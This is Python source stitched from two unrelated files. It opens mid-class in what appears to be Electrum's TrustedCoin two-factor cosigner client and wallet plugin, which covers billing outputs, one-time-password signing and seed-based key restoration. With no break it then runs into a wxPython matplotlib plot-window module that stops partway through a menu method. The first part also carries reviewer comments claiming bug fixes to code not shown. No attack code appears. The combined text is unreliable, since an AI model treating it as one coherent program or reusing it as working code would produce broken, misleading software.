        Creates a new cosigner resource.

        :param xpubkey1: a bip32 extended public key (customarily the hot key)
        :param xpubkey2: a bip32 extended public key (customarily the cold key)
        :param email: a contact email
        :param billing_plan: the billing plan for the cosigner
        """
        payload = {
            'email': email,
            'xpubkey1': xpubkey1,
            'xpubkey2': xpubkey2,
            'billing_plan': billing_plan,
        }
        return self.send_request('post', 'cosigner', payload)

    def auth(self, id, otp):
        """
        Attempt to authenticate for a particular cosigner.

        :param id: the id of the cosigner
        :param otp: the one time password
        """
        payload = {'otp': otp}
        return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)

    def get(self, id):
        """ Get billing info """
        return self.send_request('get', 'cosigner/%s' % quote(id))

    def get_challenge(self, id):
        """ Get challenge to reset Google Auth secret """
        return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))

    def reset_auth(self, id, challenge, signatures):
        """ Reset Google Auth secret """
        payload = {'challenge': challenge, 'signatures': signatures}
        return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)

    def sign(self, id, transaction, otp):
        """
        Attempt to authenticate for a particular cosigner.

        :param id: the id of the cosigner
        :param transaction: the hex encoded [partially signed] compact transaction to sign
        :param otp: the one time password
        """
        payload = {
            'otp': otp,
            'transaction': transaction
        }
        return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)

    def transfer_credit(self, id, recipient, otp, signature_callback):
        """
        Transfer a cosigner's credits to another cosigner.

        :param id: the id of the sending cosigner
        :param recipient: the id of the recipient cosigner
        :param otp: the one time password (of the sender)
        :param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
        """
        # local import: 'time' is not imported at module level in this file,
        # so the original raised NameError here
        import time
        payload = {
            'otp': otp,
            'recipient': recipient,
            'timestamp': int(time.time()),
        }
        relative_url = 'cosigner/%s/transfer' % quote(id)
        full_url = urljoin(self.base_url, relative_url)
        headers = {
            'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
        }
        # bug fix: send_request() previously accepted no headers argument, so
        # this 4-argument call raised TypeError; the signature header is now
        # forwarded properly
        return self.send_request('post', relative_url, payload, headers=headers)
# Module-level client instance shared by the plugin/wallet code below.
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
    """2-of-3 multisig wallet where the third key is held by the
    TrustedCoin co-signing server (two-factor authentication)."""
    wallet_type = '2fa'
    def __init__(self, storage):
        self.m, self.n = 2, 3
        # NOTE(review): deliberately bypasses Multisig_Wallet.__init__
        # (which derives m/n from the wallet_type string) — confirm this
        # matches the base-class expectations.
        Deterministic_Wallet.__init__(self, storage)
        self.is_billing = False  # True while the user is paying TrustedCoin itself
        self.billing_info = None  # dict fetched from the server, or None
        self.auth_code = None  # OTP entered by the user for signing
    def can_sign_without_server(self):
        """Return True if the second private key is held locally
        (i.e. 2FA was disabled at restore time)."""
        return not self.keystores['x2/'].is_watching_only()
    def get_user_id(self):
        """Return (long_id, short_id) derived from the wallet's xpubs."""
        return get_user_id(self.storage)
    def min_prepay(self):
        # Smallest prepay bundle offered in the server's price list.
        return min(self.price_per_tx.keys())
    def num_prepay(self, config):
        """Number of prepaid transactions to buy: user-configured value,
        falling back to the minimum offer when not in the price list."""
        default = self.min_prepay()
        n = config.get('trustedcoin_prepay', default)
        if n not in self.price_per_tx:
            n = default
        return n
    def extra_fee(self, config):
        """Fee owed to TrustedCoin for the next transaction, or 0 when
        no payment is due (or billing info is not yet available)."""
        if self.can_sign_without_server():
            return 0
        if self.billing_info is None:
            # Billing info not fetched yet: kick off the background
            # request and charge nothing for now.
            self.plugin.start_request_thread(self)
            return 0
        if self.billing_info.get('tx_remaining'):
            return 0
        if self.is_billing:
            return 0
        n = self.num_prepay(config)
        price = int(self.price_per_tx[n])
        # Sanity bound on the server-quoted price.
        assert price <= 100000 * n
        return price
    def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
                                  change_addr=None, is_sweep=False):
        """Build an unsigned transaction, appending a TrustedCoin billing
        output when a server fee is due."""
        mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
            self, coins, o, config, fixed_fee, change_addr)
        fee = self.extra_fee(config) if not is_sweep else 0
        if fee:
            address = self.billing_info['billing_address']
            fee_output = (TYPE_ADDRESS, address, fee)
            try:
                tx = mk_tx(outputs + [fee_output])
            except NotEnoughFunds:
                # TrustedCoin won't charge if the total inputs is
                # lower than their fee
                tx = mk_tx(outputs)
                if tx.input_value() >= fee:
                    raise
                self.print_error("not charging for this tx")
        else:
            tx = mk_tx(outputs)
        return tx
    def sign_transaction(self, tx, password):
        """Sign with the local key, then ask the TrustedCoin server for
        its signature using the user's one-time password."""
        Multisig_Wallet.sign_transaction(self, tx, password)
        if tx.is_complete():
            return
        self.plugin.prompt_user_for_otp(self, tx)
        if not self.auth_code:
            self.print_error("sign_transaction: no auth code")
            return
        long_user_id, short_id = self.get_user_id()
        tx_dict = tx.as_dict()
        raw_tx = tx_dict["hex"]
        r = server.sign(short_id, raw_tx, self.auth_code)
        if r:
            raw_tx = r.get('transaction')
            tx.update(raw_tx)
        self.print_error("twofactor: is complete", tx.is_complete())
        # reset billing_info
        self.billing_info = None
        self.auth_code = None
# Utility functions
def get_user_id(storage):
    """Derive the TrustedCoin user id pair from the wallet's two xpubs.

    Returns (long_id, short_id): long_id is the sha256 of the sorted,
    concatenated xpubs; short_id is the hex sha256 of long_id.
    """
    xpub_hot = storage.get('x1/')['xpub']
    xpub_cold = storage.get('x2/')['xpub']
    long_id = bitcoin.sha256(''.join(sorted([xpub_hot, xpub_cold])))
    short_id = hashlib.sha256(long_id).hexdigest()
    return long_id, short_id
def make_xpub(xpub, s):
    """Return a child xpub of *xpub* derived with material *s*."""
    version, _, _, _, chain, pubkey = deserialize_xpub(xpub)
    child_pubkey, child_chain = bitcoin._CKD_pub(pubkey, chain, s)
    return bitcoin.serialize_xpub(version, child_chain, child_pubkey)
def make_billing_address(wallet, num):
    """Return billing p2pkh address number *num* for *wallet*, derived
    locally from the TrustedCoin billing xpub and the wallet's long id.

    Used to verify server-reported billing addresses independently.
    """
    long_id, short_id = wallet.get_user_id()
    xpub = make_xpub(get_billing_xpub(), long_id)
    version, _, _, _, c, cK = deserialize_xpub(xpub)
    # NOTE(review): make_xpub uses bitcoin._CKD_pub (string index) while
    # this uses bitcoin.CKD_pub (integer index) — presumably intentional;
    # confirm against the bitcoin module's derivation API.
    cK, c = bitcoin.CKD_pub(cK, c, num)
    return bitcoin.public_key_to_p2pkh(cK)
class TrustedCoinPlugin(BasePlugin):
    """Plugin implementing two-factor wallets backed by the TrustedCoin
    co-signing service: wizard flows for creation/restore, billing
    requests, and one-time-password (OTP) handling."""
    wallet_class = Wallet_2fa
    def __init__(self, parent, config, name):
        BasePlugin.__init__(self, parent, config, name)
        self.wallet_class.plugin = self
        self.requesting = False  # True while a billing request thread is running
    @staticmethod
    def is_valid_seed(seed):
        # 2FA wallets use seeds carrying a dedicated version prefix.
        return bitcoin.is_new_seed(seed, SEED_PREFIX)
    def is_available(self):
        return True
    def is_enabled(self):
        return True
    def can_user_disable(self):
        return False
    @hook
    def get_tx_extra_fee(self, wallet, tx):
        """Return (address, amount) of the TrustedCoin fee output in *tx*,
        or None when the tx carries no billing output."""
        if type(wallet) != Wallet_2fa:
            return
        if wallet.billing_info is None:
            assert wallet.can_sign_without_server()
            return None
        address = wallet.billing_info['billing_address']
        for _type, addr, amount in tx.outputs():
            if _type == TYPE_ADDRESS and addr == address:
                return address, amount
    def finish_requesting(func):
        # Decorator: always clear self.requesting when the wrapped
        # request finishes, whether it succeeded or raised.
        def f(self, *args, **kwargs):
            try:
                return func(self, *args, **kwargs)
            finally:
                self.requesting = False
        return f
    @finish_requesting
    def request_billing_info(self, wallet):
        """Fetch billing info from the server and attach it to *wallet*.

        Returns True on success; returns None when no server is needed
        or the server is unreachable.
        """
        if wallet.can_sign_without_server():
            return
        self.print_error("request billing info")
        try:
            billing_info = server.get(wallet.get_user_id()[1])
        except ErrorConnectingServer as e:
            self.print_error('cannot connect to TrustedCoin server: {}'.format(e))
            return
        # Re-derive the billing address locally so a malicious server
        # cannot substitute its own address.
        billing_address = make_billing_address(wallet, billing_info['billing_index'])
        assert billing_address == billing_info['billing_address']
        wallet.billing_info = billing_info
        wallet.price_per_tx = dict(billing_info['price_per_tx'])
        wallet.price_per_tx.pop(1)
        return True
    def start_request_thread(self, wallet):
        """Fetch billing info on a daemon thread; at most one in flight."""
        from threading import Thread
        if self.requesting is False:
            self.requesting = True
            t = Thread(target=self.request_billing_info, args=(wallet,))
            t.setDaemon(True)
            t.start()
            return t
    def make_seed(self):
        """Generate a fresh 2FA seed phrase."""
        return Mnemonic('english').make_seed(seed_type='2fa', num_bits=128)
    @hook
    def do_clear(self, window):
        window.wallet.is_billing = False
    def show_disclaimer(self, wizard):
        """Wizard entry point: show the TrustedCoin disclaimer."""
        wizard.set_icon(':icons/trustedcoin-wizard.png')
        wizard.stack = []
        wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(DISCLAIMER), run_next = lambda x: wizard.run('choose_seed'))
    def choose_seed(self, wizard):
        """Ask whether to create a new seed or restore from an existing one."""
        title = _('Create or restore')
        message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
        choices = [
            ('create_seed', _('Create a new seed')),
            ('restore_wallet', _('I already have a seed')),
        ]
        wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
    def create_seed(self, wizard):
        seed = self.make_seed()
        f = lambda x: wizard.request_passphrase(seed, x)
        wizard.show_seed_dialog(run_next=f, seed_text=seed)
    @classmethod
    def get_xkeys(self, seed, passphrase, derivation):
        """Derive (xprv, xpub) at *derivation* from a mnemonic seed."""
        from electrum_nmc.mnemonic import Mnemonic
        from electrum_nmc.keystore import bip32_root, bip32_private_derivation
        bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
        xprv, xpub = bip32_root(bip32_seed, 'standard')
        xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
        return xprv, xpub
    @classmethod
    def xkeys_from_seed(self, seed, passphrase):
        """Return (xprv1, xpub1, xprv2, xpub2) for the two local keystores,
        handling both the legacy long-seed and the current 12-word format."""
        words = seed.split()
        n = len(words)
        # old version use long seed phrases
        if n >= 20:
            # note: pre-2.7 2fa seeds were typically 24-25 words, however they
            # could probabilistically be arbitrarily shorter due to a bug. (see #3611)
            # the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
            assert passphrase == ''
            xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), '', "m/")
            xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), '', "m/")
        elif n==12:
            xprv1, xpub1 = self.get_xkeys(seed, passphrase, "m/0'/")
            xprv2, xpub2 = self.get_xkeys(seed, passphrase, "m/1'/")
        else:
            raise Exception('unrecognized seed length: {} words'.format(n))
        return xprv1, xpub1, xprv2, xpub2
    def create_keystore(self, wizard, seed, passphrase):
        # this overloads the wizard's method
        xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
        k1 = keystore.from_xprv(xprv1)
        k2 = keystore.from_xpub(xpub2)
        wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
    def on_password(self, wizard, password, encrypt_storage, k1, k2):
        """Persist the two local keystores, then prompt the user to go
        online for the final (remote key) creation step."""
        k1.update_password(None, password)
        wizard.storage.set_keystore_encryption(bool(password))
        if encrypt_storage:
            wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
        wizard.storage.put('x1/', k1.dump())
        wizard.storage.put('x2/', k2.dump())
        wizard.storage.write()
        msg = [
            _("Your wallet file is: {}.").format(os.path.abspath(wizard.storage.path)),
            _("You need to be online in order to complete the creation of "
              "your wallet. If you generated your seed on an offline "
              'computer, click on "{}" to close this window, move your '
              "wallet file to an online computer, and reopen it with "
              "Electrum.").format(_('Cancel')),
            _('If you are online, click on "{}" to continue.').format(_('Next'))
        ]
        msg = '\n\n'.join(msg)
        wizard.stack = []
        wizard.confirm_dialog(title='', message=msg, run_next = lambda x: wizard.run('create_remote_key'))
    def restore_wallet(self, wizard):
        wizard.opt_bip39 = False
        wizard.opt_ext = True
        title = _("Restore two-factor Wallet")
        f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
        wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
    def on_restore_seed(self, wizard, seed, is_ext):
        f = lambda x: self.restore_choice(wizard, seed, x)
        wizard.passphrase_dialog(run_next=f) if is_ext else f('')
    def restore_choice(self, wizard, seed, passphrase):
        """Let the user choose whether to keep 2FA or disable it."""
        wizard.set_icon(':icons/trustedcoin-wizard.png')
        wizard.stack = []
        title = _('Restore 2FA wallet')
        msg = ' '.join([
            'You are going to restore a wallet protected with two-factor authentication.',
            'Do you want to keep using two-factor authentication with this wallet,',
            'or do you want to disable it, and have two master private keys in your wallet?'
        ])
        choices = [('keep', 'Keep'), ('disable', 'Disable')]
        f = lambda x: self.on_choice(wizard, seed, passphrase, x)
        wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
    def on_choice(self, wizard, seed, passphrase, x):
        if x == 'disable':
            f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
            wizard.request_password(run_next=f)
        else:
            self.create_keystore(wizard, seed, passphrase)
    def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
        """Restore with 2FA disabled: both private keys are stored
        locally; the third (server) key is derived deterministically."""
        storage = wizard.storage
        xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
        k1 = keystore.from_xprv(xprv1)
        k2 = keystore.from_xprv(xprv2)
        k1.add_seed(seed)
        k1.update_password(None, password)
        k2.update_password(None, password)
        storage.put('x1/', k1.dump())
        storage.put('x2/', k2.dump())
        long_user_id, short_id = get_user_id(storage)
        xpub3 = make_xpub(get_signing_xpub(), long_user_id)
        k3 = keystore.from_xpub(xpub3)
        storage.put('x3/', k3.dump())
        storage.set_keystore_encryption(bool(password))
        if encrypt_storage:
            storage.set_password(password, enc_version=STO_EV_USER_PW)
        wizard.wallet = Wallet_2fa(storage)
        wizard.create_addresses()
    def create_remote_key(self, wizard):
        """Register the wallet with the TrustedCoin server and verify the
        third cosigner key; a 409 means the wallet is already registered."""
        email = self.accept_terms_of_use(wizard)
        xpub1 = wizard.storage.get('x1/')['xpub']
        xpub2 = wizard.storage.get('x2/')['xpub']
        # Generate third key deterministically.
        long_user_id, short_id = get_user_id(wizard.storage)
        xpub3 = make_xpub(get_signing_xpub(), long_user_id)
        # secret must be sent by the server
        try:
            r = server.create(xpub1, xpub2, email)
        except socket.error:
            wizard.show_message('Server not reachable, aborting')
            return
        except TrustedCoinException as e:
            if e.status_code == 409:
                r = None
            else:
                wizard.show_message(str(e))
                return
        if r is None:
            otp_secret = None
        else:
            otp_secret = r.get('otp_secret')
            if not otp_secret:
                wizard.show_message(_('Error'))
                return
            _xpub3 = r['xpubkey_cosigner']
            _id = r['id']
            try:
                assert _id == short_id, ("user id error", _id, short_id)
                assert xpub3 == _xpub3, ("xpub3 error", xpub3, _xpub3)
            except Exception as e:
                wizard.show_message(str(e))
                return
        self.check_otp(wizard, short_id, otp_secret, xpub3)
    def check_otp(self, wizard, short_id, otp_secret, xpub3):
        """Ask the user for an OTP, or branch into the secret-reset flow."""
        otp, reset = self.request_otp_dialog(wizard, short_id, otp_secret)
        if otp:
            self.do_auth(wizard, short_id, otp, xpub3)
        elif reset:
            wizard.opt_bip39 = False
            wizard.opt_ext = True
            f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
            wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
    def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
        f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
        wizard.passphrase_dialog(run_next=f) if is_ext else f('')
    def do_auth(self, wizard, short_id, otp, xpub3):
        """Authenticate the OTP with the server and finalize the wallet."""
        try:
            server.auth(short_id, otp)
        except:
            # NOTE(review): bare except also reports connectivity failures
            # as "Incorrect password" — consider narrowing.
            wizard.show_message(_('Incorrect password'))
            return
        k3 = keystore.from_xpub(xpub3)
        wizard.storage.put('x3/', k3.dump())
        wizard.storage.put('use_trustedcoin', True)
        wizard.storage.write()
        wizard.wallet = Wallet_2fa(wizard.storage)
        wizard.run('create_addresses')
    def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
        """Prove seed ownership to the server to reset the OTP secret."""
        xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
        try:
            assert xpub1 == wizard.storage.get('x1/')['xpub']
            assert xpub2 == wizard.storage.get('x2/')['xpub']
        except:
            wizard.show_message(_('Incorrect seed'))
            return
        r = server.get_challenge(short_id)
        challenge = r.get('challenge')
        message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
        def f(xprv):
            # Sign the challenge with the key at path 0/0 of each xprv.
            _, _, _, _, c, k = deserialize_xprv(xprv)
            pk = bip32_private_key([0, 0], k, c)
            key = regenerate_key(pk)
            sig = key.sign_message(message, True)
            return base64.b64encode(sig).decode()
        signatures = [f(x) for x in [xprv1, xprv2]]
        r = server.reset_auth(short_id, challenge, signatures)
        new_secret = r.get('otp_secret')
        if not new_secret:
            wizard.show_message(_('Request rejected by server'))
            return
        self.check_otp(wizard, short_id, new_secret, xpub3)
    @hook
    def get_action(self, storage):
        """Tell the install wizard which setup step a 2FA wallet still needs."""
        if storage.get('wallet_type') != '2fa':
            return
        if not storage.get('x1/'):
            return self, 'show_disclaimer'
        if not storage.get('x2/'):
            return self, 'show_disclaimer'
        if not storage.get('x3/'):
            return self, 'create_remote_key'
""" plotwindow.py - wxPython control for displaying matplotlib plots
Chris R. Coughlin (TRI/Austin, Inc.)
"""
__author__ = 'Chris R. Coughlin'
import ui_defaults
from controllers.plotwindow_ctrl import PlotWindowController, ImgPlotWindowController, MegaPlotWindowController
from models import workerthread
from models.mainmodel import get_logger
import wx
from matplotlib.figure import Figure
from matplotlib.widgets import Cursor
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas
from matplotlib.backends.backend_wxagg import NavigationToolbar2WxAgg
import os.path
import Queue
module_logger = get_logger(__name__)
class PlotWindow(wx.Frame):
    """Basic wxPython UI element for displaying matplotlib plots.

    Note: wx.Frame.__init__ is deliberately deferred until load_data()
    has successfully loaded the data set.
    """
    def __init__(self, parent, data_file):
        self.parent = parent
        self.data_file = data_file
        self.controller = PlotWindowController(self, data_file)
        module_logger.info("Successfully initialized PlotWindow.")
        self.load_data()
    def has_data(self):
        """Returns True if data is not None"""
        return self.controller.data is not None
    def load_data(self):
        """Loads the data set on a worker thread and plots it.

        Keeps the UI responsive by yielding to wx while polling the
        worker; any exception raised in the worker is reported in a
        modal error dialog."""
        exception_queue = Queue.Queue()
        data_thd = workerthread.WorkerThread(exception_queue=exception_queue,
                                             target=self.controller.load_data)
        data_thd.start()
        while True:
            data_thd.join(0.125)
            if not data_thd.is_alive():
                try:
                    exc_type, exc = exception_queue.get(block=False)
                    err_str = str(exc)
                    if len(err_str) == 0:
                        # Fall back to the exception class name when the
                        # exception has no message.
                        err_str = exc_type.__name__
                    module_logger.error("Unable to load data: {0}".format(err_str))
                    err_msg = "An error occurred while loading data:\n{0}".format(err_str)
                    if len(err_msg) > 150:
                        # Truncate lengthy error messages
                        err_msg = ''.join([err_msg[:150], "\n(continued)"])
                    err_dlg = wx.MessageDialog(self.parent, message=err_msg,
                                               caption="Unable To Load Data", style=wx.ICON_ERROR)
                    err_dlg.ShowModal()
                except Queue.Empty:
                    # Empty queue means the worker finished cleanly.
                    pass
                break
            wx.GetApp().Yield(True)
        if self.has_data():
            self.title = 'Plot - {0}'.format(os.path.basename(self.data_file))
            wx.Frame.__init__(self, id=wx.ID_ANY, parent=self.parent, title=self.title)
            self.init_menu()
            self.init_ui()
            self.controller.plot(self.controller.data)
    def init_ui(self):
        """Creates the PlotWindow UI"""
        parent_x, parent_y = self.parent.GetPositionTuple()
        parent_w, parent_h = self.parent.GetSize()
        self.SetPosition((parent_x + parent_w + ui_defaults.widget_margin,
                          ui_defaults.widget_margin))
        self.sizer = wx.BoxSizer(wx.VERTICAL)
        self.figure = Figure(figsize=(5, 4))
        self.canvas = FigureCanvas(self, wx.ID_ANY, self.figure)
        self.axes = self.figure.add_subplot(111, picker=True)
        self.axes.grid(True)
        #self.cursor = Cursor(self.axes, useblit=True, color='green', alpha=0.5, linestyle='--',
        #                     linewidth=2)
        self.sizer.Add(self.canvas, 1, ui_defaults.sizer_flags, 0)
        self.add_toolbar()
        self.SetIcon(self.parent.GetIcon())
        self.SetSizerAndFit(self.sizer)
    def add_toolbar(self):
        """Creates the matplotlib toolbar (zoom, pan/scroll, etc.)
        for the plot"""
        # Fix: this module imports NavigationToolbar2WxAgg (see module
        # imports); the previous NavigationToolbar2Wx name was never
        # imported and raised NameError at runtime.
        self.toolbar = NavigationToolbar2WxAgg(self.canvas)
        self.toolbar.Realize()
        if wx.Platform == '__WXMAC__':
            # On OS X the toolbar must be attached to the frame itself.
            self.SetToolBar(self.toolbar)
        else:
            tw, th = self.toolbar.GetSizeTuple()
            fw, fh = self.canvas.GetSizeTuple()
            self.toolbar.SetSize(wx.Size(fw, th))
            self.sizer.Add(self.toolbar, 0, wx.LEFT | wx.EXPAND, 0)
        self.toolbar.update()
    def init_menu(self):
        """Creates the main menu"""
        self.menubar = wx.MenuBar()
        self.init_file_menu()
        self.init_plot_menu()
        self.init_ops_menu()
        self.init_tools_menu()
        self.init_help_menu()
        self.SetMenuBar(self.menubar)
    def init_file_menu(self):
        """Creates the File menu"""
        self.file_mnu = wx.Menu()
        savedata_mnui = wx.MenuItem(self.file_mnu, wx.ID_ANY, text="Save Current Data",
                                    help="Save current data to disk")
        self.Bind(wx.EVT_MENU, self.controller.on_save_data, id=savedata_mnui.GetId())
        self.file_mnu.AppendItem(savedata_mnui)
        close_mnui = wx.MenuItem(self.file_mnu, wx.ID_ANY, text="Close Window",
                                 help="Close the plot window")
        self.Bind(wx.EVT_MENU, self.controller.on_close, id=close_mnui.GetId())
        self.file_mnu.AppendItem(close_mnui)
        self.menubar.Append(self.file_mnu, "&File")
    def init_plot_menu(self):
        """Creates the Plot menu"""
        self.plot_mnu = wx.Menu()
        self.labels_mnu = wx.Menu() # Titles and Labels
        plottitle_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set Plot Title",
                                     help="Set Plot Title")
        self.Bind(wx.EVT_MENU, self.controller.on_set_plottitle, id=plottitle_mnui.GetId())
        self.labels_mnu.AppendItem(plottitle_mnui)
        xlbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set X Axis Label",
                                help="Set X Axis Label")
        self.Bind(wx.EVT_MENU, self.controller.on_set_xlabel, id=xlbl_mnui.GetId())
        self.labels_mnu.AppendItem(xlbl_mnui)
        ylbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set Y Axis Label",
                                help="Set Y Axis Label")
        self.Bind(wx.EVT_MENU, self.controller.on_set_ylabel, id=ylbl_mnui.GetId())
        self.labels_mnu.AppendItem(ylbl_mnui)
        self.plot_mnu.AppendMenu(wx.ID_ANY, 'Title And Labels', self.labels_mnu)
        gridtoggle_mnui = wx.MenuItem(self.plot_mnu, wx.ID_ANY, text="Toggle Grid",
                                      help="Turns grid on or off")
        self.plot_mnu.AppendItem(gridtoggle_mnui)
        self.Bind(wx.EVT_MENU, self.controller.on_toggle_grid, id=gridtoggle_mnui.GetId())
        self.menubar.Append(self.plot_mnu, "&Plot")
    def init_ops_menu(self):
        """Creates the Operations menu"""
        self.ops_mnu = wx.Menu()
        self.revert_mnui = wx.MenuItem(self.ops_mnu, wx.ID_ANY, text='Revert To Original',
                                       help='Revert to original data set')
        self.Bind(wx.EVT_MENU, self.controller.on_revert, id=self.revert_mnui.GetId())
        self.ops_mnu.AppendItem(self.revert_mnui)
        self.init_specific_ops_menu()
        self.menubar.Append(self.ops_mnu, '&Operations')
    def init_specific_ops_menu(self):
        """Creates any plot-specific Operations menu items"""
        self.rect_mnu = wx.Menu() # Rectification operations
        self.fullrect_mnui = wx.MenuItem(self.rect_mnu, wx.ID_ANY, text="Full",
                                         help="Full Rectification")
        self.Bind(wx.EVT_MENU, self.controller.on_rectify, id=self.fullrect_mnui.GetId())
        self.rect_mnu.AppendItem(self.fullrect_mnui)
        self.ops_mnu.AppendMenu(wx.ID_ANY, 'Rectify', self.rect_mnu)
        self.gate_mnu = wx.Menu() # Gates operations
        for gate in self.controller.gates:
            gate_name = self.controller.gates[gate][0]
            gate_desc = "Applies a {0} gate function to the data".format(gate_name)
            gate_mnui = wx.MenuItem(self.gate_mnu, id=gate, text=gate_name, help=gate_desc)
            self.gate_mnu.AppendItem(gate_mnui)
            self.Bind(wx.EVT_MENU, self.controller.on_apply_gate, id=gate_mnui.GetId())
        self.ops_mnu.AppendMenu(wx.ID_ANY, 'Gates', self.gate_mnu)
    def init_tools_menu(self):
        """Initializes the Tools Menu (Plugins and external scripts)"""
        self.tools_mnu = wx.Menu()
        self.init_plugins_menu()
        self.menubar.Append(self.tools_mnu, '&Tools')
    def init_plugins_menu(self):
        """Initializes the Plugins menu"""
        # If the Plugins menu already exists,
        # delete and rebuild. Used to refresh
        # list of available plugins after installing
        # a new one
        plugins_mnu_id = self.tools_mnu.FindItem("Plugins")
        if plugins_mnu_id != -1:
            self.tools_mnu.RemoveItem(self.tools_mnu.FindItemById(plugins_mnu_id))
        self.plugins_mnu = wx.Menu()
        plugins = self.controller.available_plugins
        for plugin_id, plugin in plugins.items():
            plugin_name = plugin[1].name
            plugin_description = plugin[1].description
            script_mnui = wx.MenuItem(self.tools_mnu, id=plugin_id, text=plugin_name,
                                      help=plugin_description)
            self.Bind(wx.EVT_MENU, self.controller.on_run_toolkit, id=script_mnui.GetId())
            self.plugins_mnu.AppendItem(script_mnui)
        self.plugins_mnu.AppendSeparator()
        install_plugin_mnui = wx.MenuItem(self.plugins_mnu, wx.ID_ANY, text="Install Plugin...",
                                          help="Install a local plugin")
        self.Bind(wx.EVT_MENU, self.controller.on_install_plugin, id=install_plugin_mnui.GetId())
        self.plugins_mnu.AppendItem(install_plugin_mnui)
        download_plugin_mnui = wx.MenuItem(self.plugins_mnu, wx.ID_ANY, text="Download Plugin...",
                                           help="Download and install a new plugin")
        self.Bind(wx.EVT_MENU, self.controller.on_download_plugin, id=download_plugin_mnui.GetId())
        self.plugins_mnu.AppendItem(download_plugin_mnui)
        self.tools_mnu.AppendMenu(wx.ID_ANY, "Plugins", self.plugins_mnu)
    def init_help_menu(self):
        """Creates the Help menu (not yet implemented)."""
        pass
class ImgPlotWindow(PlotWindow):
    """Specialized PlotWindow for handling imgplots"""
    def __init__(self, parent, data_file):
        self.parent = parent
        self.data_file = data_file
        self.controller = ImgPlotWindowController(self, data_file)
        module_logger.info("Successfully initialized ImgPlotWindow.")
        self.load_data()
    def load_data(self):
        """Loads the data set and plots"""
        # Same polling scheme as PlotWindow.load_data, but always builds
        # the frame afterwards and additionally validates data dimensions.
        exception_queue = Queue.Queue()
        data_thd = workerthread.WorkerThread(exception_queue=exception_queue,
                                             target=self.controller.load_data)
        data_thd.start()
        while True:
            data_thd.join(0.125)
            if not data_thd.is_alive():
                try:
                    exc_type, exc = exception_queue.get(block=False)
                    module_logger.error("Unable to load data: {0}".format(exc))
                    err_msg = "An error occurred while loading data:\n{0}".format(exc)
                    if len(err_msg) > 150:
                        # Truncate lengthy error messages
                        err_msg = ''.join([err_msg[:150], "\n(continued)"])
                    err_dlg = wx.MessageDialog(self.parent, message=err_msg,
                                               caption="Unable To Load Data", style=wx.ICON_ERROR)
                    err_dlg.ShowModal()
                except Queue.Empty:
                    # Empty queue means the worker finished cleanly.
                    pass
                break
            wx.GetApp().Yield(True)
        self.title = 'Plot - {0}'.format(os.path.basename(self.data_file))
        wx.Frame.__init__(self, id=wx.ID_ANY, parent=self.parent, title=self.title)
        self.init_menu()
        self.init_ui()
        self.controller.check_data_dims()
        self.controller.plot(self.controller.data)
    def init_plot_menu(self):
        """Creates the Plot menu"""
        self.plot_mnu = wx.Menu()
        self.labels_mnu = wx.Menu() # Titles and Labels
        plottitle_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set Plot Title",
                                     help="Set Plot Title")
        self.Bind(wx.EVT_MENU, self.controller.on_set_plottitle, id=plottitle_mnui.GetId())
        self.labels_mnu.AppendItem(plottitle_mnui)
        xlbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set X Axis Label",
                                help="Set X Axis Label")
        self.Bind(wx.EVT_MENU, self.controller.on_set_xlabel, id=xlbl_mnui.GetId())
        self.labels_mnu.AppendItem(xlbl_mnui)
        ylbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set Y Axis Label",
                                help="Set Y Axis Label")
        self.Bind(wx.EVT_MENU, self.controller.on_set_ylabel, id=ylbl_mnui.GetId())
        self.labels_mnu.AppendItem(ylbl_mnui)
        cbarlbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text='Set Colorbar Label',
                                   help='Set Colorbar Label')
        self.Bind(wx.EVT_MENU, self.controller.on_set_cbarlbl, id=cbarlbl_mnui.GetId())
        self.labels_mnu.AppendItem(cbarlbl_mnui)
        self.plot_mnu.AppendMenu(wx.ID_ANY, "Title And Labels", self.labels_mnu)
        self.colormaps_mnu = wx.Menu() # Colormaps
